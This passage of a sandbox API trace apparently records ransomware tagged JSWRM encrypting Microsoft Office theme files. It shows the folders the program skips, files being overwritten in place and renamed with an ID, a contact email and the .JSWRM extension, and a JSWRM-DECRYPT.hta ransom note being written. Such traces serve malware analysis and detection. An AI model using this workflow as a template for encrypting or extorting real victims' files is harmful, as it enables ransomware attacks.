(HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0100.934] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0100.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0100.934] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0100.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0100.934] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.934] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Smokey Glass.eftx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\smokey glass.eftx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Smokey Glass.eftx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\smokey glass.eftx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0100.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0100.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0100.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0100.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0100.935] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11482f7f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11482f7f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11482f7f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb17b, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Subtle Solids.eftx", cAlternateFileName="SUBTLE~1.EFT")) returned 1 [0100.935] lstrcmpiW (lpString1="Subtle Solids.eftx", lpString2=".") returned 1 [0100.935] lstrcmpiW (lpString1="Subtle Solids.eftx", lpString2="..") returned 1 [0100.935] lstrcmpiW (lpString1="Subtle Solids.eftx", lpString2="...") returned 1 [0100.935] lstrcmpiW (lpString1="Subtle Solids.eftx", lpString2="windows") returned -1 [0100.935] lstrcmpiW (lpString1="Subtle Solids.eftx", lpString2="recovery") returned 1 [0100.935] lstrcmpiW (lpString1="Subtle Solids.eftx", lpString2="perflogs") returned 1 [0100.935] lstrcmpiW (lpString1="Subtle Solids.eftx", lpString2="documents and settings") returned 1 [0100.935] lstrcmpiW (lpString1="Subtle Solids.eftx", lpString2="$RECYCLE.BIN") returned 1 [0100.935] lstrcmpiW (lpString1="Subtle Solids.eftx", lpString2="system volume information") returned -1 [0100.935] lstrcmpiW (lpString1="Subtle Solids.eftx", lpString2="msocache") returned 1 [0100.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Subtle Solids.eftx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0100.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0100.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Subtle Solids.eftx", cchWideChar=18, lpMultiByteStr=0x240f70, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Subtle Solids.eftx", lpUsedDefaultChar=0x0) returned 18 [0100.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Subtle Solids.eftx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0100.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0100.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Subtle Solids.eftx", cchWideChar=18, lpMultiByteStr=0x241308, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Subtle Solids.eftx", lpUsedDefaultChar=0x0) returned 18 [0100.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.935] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0100.935] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c000 | out: hHeap=0x1e0000) returned 1 [0100.935] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0100.936] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Subtle Solids.eftx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\subtle solids.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.936] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=45435) returned 1 [0100.936] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.936] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb170) returned 0x24d210 [0100.936] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xb170, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xb170, lpOverlapped=0x0) returned 1 [0100.953] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.953] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xb170, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xb170, lpOverlapped=0x0) returned 1 [0100.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.953] CloseHandle (hObject=0x314) returned 1 [0100.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0100.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0100.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0100.953] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0100.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b8f8 [0100.953] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f5f8 [0100.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0100.953] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0100.953] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Subtle Solids.eftx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\subtle solids.eftx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Subtle Solids.eftx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\subtle solids.eftx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0100.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0100.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0100.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0100.954] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0100.954] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11482f7f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11482f7f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114a91d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xde70, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Top Shadow.eftx", cAlternateFileName="TOPSHA~1.EFT")) returned 1 [0100.954] lstrcmpiW (lpString1="Top Shadow.eftx", lpString2=".") returned 1 [0100.954] lstrcmpiW (lpString1="Top Shadow.eftx", lpString2="..") returned 1 [0100.954] lstrcmpiW (lpString1="Top Shadow.eftx", lpString2="...") returned 1 [0100.954] lstrcmpiW (lpString1="Top Shadow.eftx", lpString2="windows") returned -1 [0100.954] lstrcmpiW (lpString1="Top Shadow.eftx", lpString2="recovery") returned 1 [0100.954] lstrcmpiW (lpString1="Top Shadow.eftx", lpString2="perflogs") returned 1 [0100.955] lstrcmpiW (lpString1="Top Shadow.eftx", lpString2="documents and settings") returned 1 [0100.955] lstrcmpiW (lpString1="Top Shadow.eftx", lpString2="$RECYCLE.BIN") returned 1 [0100.955] lstrcmpiW (lpString1="Top Shadow.eftx", lpString2="system volume information") returned 1 [0100.955] lstrcmpiW (lpString1="Top Shadow.eftx", lpString2="msocache") returned 1 [0100.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0100.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top Shadow.eftx", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0100.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top Shadow.eftx", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top Shadow.eftx", lpUsedDefaultChar=0x0) returned 15 [0100.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0100.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0100.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top Shadow.eftx", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0100.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top Shadow.eftx", cchWideChar=15, lpMultiByteStr=0x345eba8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top Shadow.eftx", lpUsedDefaultChar=0x0) returned 15 [0100.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0100.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0100.955] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0100.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.955] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.955] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0100.955] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Top Shadow.eftx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\top shadow.eftx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0100.956] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=56944) returned 1 [0100.956] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.956] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xde70) returned 0x24d210 [0100.956] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xde70, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xde70, lpOverlapped=0x0) returned 1 [0100.961] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.961] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xde70, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xde70, lpOverlapped=0x0) returned 1 [0100.961] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.961] CloseHandle (hObject=0x314) returned 1 [0100.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0100.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.961] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0100.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0100.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0100.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0100.962] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0100.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0100.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0100.962] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Top Shadow.eftx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\top shadow.eftx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Effects\\Top Shadow.eftx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme effects\\top shadow.eftx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.962] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0100.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0100.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0100.963] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11482f7f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11482f7f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x114a91d5, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xde70, dwReserved0=0xfffffffe, dwReserved1=0x345ea88, cFileName="Top Shadow.eftx", cAlternateFileName="TOPSHA~1.EFT")) returned 0 [0100.963] FindClose (in: hFindFile=0x231e00 | out: hFindFile=0x231e00) returned 1 [0100.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0100.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0100.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0100.963] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x11436ace, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x115da4b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x115da4b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Theme Fonts", cAlternateFileName="THEMEF~1")) returned 1 [0100.963] lstrcmpiW (lpString1="Theme Fonts", lpString2=".") returned 1 [0100.963] lstrcmpiW (lpString1="Theme Fonts", lpString2="..") returned 1 [0100.963] lstrcmpiW (lpString1="Theme Fonts", lpString2="...") returned 1 [0100.963] lstrcmpiW (lpString1="Theme Fonts", lpString2="windows") returned -1 [0100.963] lstrcmpiW (lpString1="Theme Fonts", lpString2="recovery") returned 1 [0100.963] lstrcmpiW (lpString1="Theme Fonts", lpString2="perflogs") returned 1 [0100.963] lstrcmpiW (lpString1="Theme Fonts", lpString2="documents and settings") returned 1 [0100.963] lstrcmpiW (lpString1="Theme Fonts", lpString2="$RECYCLE.BIN") returned 1 [0100.963] lstrcmpiW (lpString1="Theme Fonts", lpString2="system volume information") returned 1 [0100.963] lstrcmpiW (lpString1="Theme Fonts", lpString2="msocache") returned 1 [0100.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0100.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0100.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0100.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0100.963] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0100.963] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0100.963] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\jswrm-decrypt.hta")) returned 0xffffffff [0100.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0100.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0100.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x205850 [0100.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0100.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24d210 [0100.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0100.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d488 [0100.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0100.964] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d488 | out: hHeap=0x1e0000) returned 1 [0100.964] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0100.965] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.965] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0100.966] CloseHandle (hObject=0x45c) returned 1 [0100.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0100.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0100.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0100.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0100.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0100.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0100.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0100.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0100.966] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Theme Fonts\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\theme fonts\\jswrm-decrypt.hta")) returned 0x20 [0100.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0100.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0100.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0100.966] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 